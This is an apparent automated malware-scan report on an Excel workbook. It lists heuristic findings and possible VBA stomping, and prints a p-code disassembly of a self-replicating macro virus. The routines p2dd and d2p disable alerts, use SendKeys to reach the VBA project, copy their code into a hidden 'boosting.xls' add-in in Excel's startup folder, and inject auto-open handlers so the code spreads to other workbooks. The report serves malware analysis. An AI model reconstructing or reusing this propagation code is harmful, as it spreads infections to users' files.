MALICIOUS
102
Risk Score
Heuristics 3
-
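Reference to URLDownloadToFile API — critical — SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API. In the preview below the API appears only as a `Declare` at p-code Line #0 of ThisWorkbook; neither of the two disassembled procedures calls it, so this rule matched a declaration, not an observed download.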
-
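Reference to ShellExecute API — high — SC_STR_SHELLEXEC: Reference to ShellExecute API. In the preview below the API appears only as a `Declare` at p-code Line #1 of ThisWorkbook; neither of the two disassembled procedures calls it.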
-
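VBA project contains no executable statements — info — OLE_VBA_MACROS: Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements. This finding describes the decoded source text only: the p-code listing in the preview shows compiled procedures (p2dd, d2p) in the ThisWorkbook stream, so the project should not be read as inert. A source/p-code mismatch like this is consistent with the source having been stripped while the p-code was kept (VBA stomping); confirm against the raw module stream.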
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11595 bytes |
| SHA-256: 670a855c140da7b09052436b0f7742dae226dfe7b988230cbe7b5cbe65d1aef5 | | | |
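Preview script: first 1,000 lines of the extracted script. The `Attribute` lines are the decoded source of the sheet modules (Sheet1–Sheet7); the lines commented with `'` are a p-code disassembly of the ThisWorkbook module stream.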
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/6b60c3f2213c4fb484261a05a3c8e666.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 6592 bytes
' Line #0:
' FuncDefn (Private Declare Function URLDownloadToFile Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #1:
' FuncDefn (Private Declare Function ShellExecute Lib "shell32.dll" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long)
' Line #2:
' Dim (Private)
' VarDefn (WithEvents) app (As Application) 0x0000
' Line #3:
' Line #4:
' FuncDefn (Private Sub p2dd())
' Line #5:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' OnError (Resume Next)
' Line #7:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #8:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #9:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #10:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #11:
' ArgsCall DoEvents 0x0000
' Line #12:
' EndIfBlock
' Line #13:
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0034
' Eq
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0038
' Eq
' Or
' IfBlock
' Line #14:
' LitStr 0x0006 "update"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' LitStr 0x000B "OfficeCheck"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' Or
' IfBlock
' Line #15:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' St k
' Line #16:
' LitDI2 0x0001
' Ld k
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #17:
' EndIfBlock
' Line #18:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #19:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #20:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #21:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #22:
' StartForVariable
' Next
' Line #23:
' EndWith
' Line #24:
' Line #25:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #27:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #28:
' LitDI2 0x0097
' LitStr 0x0008 "Call d2p"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #29:
' LitDI2 0x0098
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #30:
' LitDI2 0x0099
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #31:
' EndIfBlock
' Line #32:
' EndIfBlock
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Sub d2p())
' Line #36:
' Dim
' VarDefn pth (As String)
' Line #37:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #38:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #39:
' OnError (Resume Next)
' Line #40:
' Ld Application
' MemLd StartupPath
' LitStr 0x000D "\boosting.xls"
' Concat
' St pth1
' Line #41:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #42:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #43:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #44:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #45:
' ArgsCall DoEvents 0x0000
' Line #46:
' EndIfBlock
' Line #47:
' Ld pth1
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #48:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #49:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Ne
' IfBlock
' Line #50:
' Ld pth1
' ParamNamed Filename
' LitDI2 0x0012
' ParamNamed FileFormat
' Ld Workbooks
' MemLd Add
' ArgsMemCall SaveAs 0x0002
' Line #51:
' QuoteRem 0x0000 0x0004 "Else"
' Line #52:
' QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #53:
' EndIfBlock
' Line #54:
' SetStmt
' Ld pth1
' Ld Workbooks
' ArgsMemLd Open 0x0001
' Set Wb
' Line #55:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #56:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #57:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #58:
' StartForVariable
' Next
' Line #59:
' EndWith
' Line #60:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' Ld ActiveWorkbook
' MemLd Name
' LitStr 0x000C "boosting.xls"
' Eq
' And
' IfBlock
' Line #61:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #62:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #63:
' LitDI2 0x0097
' LitStr 0x0015 "Set App = Application"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #64:
' LitDI2 0x0098
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #65:
' LitDI2 0x0099
' LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #66:
' LitDI2 0x009A
' LitStr 0x000D "Call runtimer"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #67:
' LitDI2 0x009B
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #68:
' LitDI2 0x009C
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #69:
' EndIfBlock
' Line #70:
' LitVarSpecial (True)
' Ld ActiveWorkbook
' MemSt IsAddin
' Line #71:
' Ld Wb
' ArgsMemCall Save 0x0000
' Line #72:
' Ld Wb
' ArgsMemCall Close 0x0000
' Line #73:
' EndIfBlock
' Line #74:
' Ld pth1
' Paren
' Ld Workbooks
' ArgsMemCall Open 0x0001
' Line #75:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet4 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet5 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet6 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet7 - 985 bytes
|
|||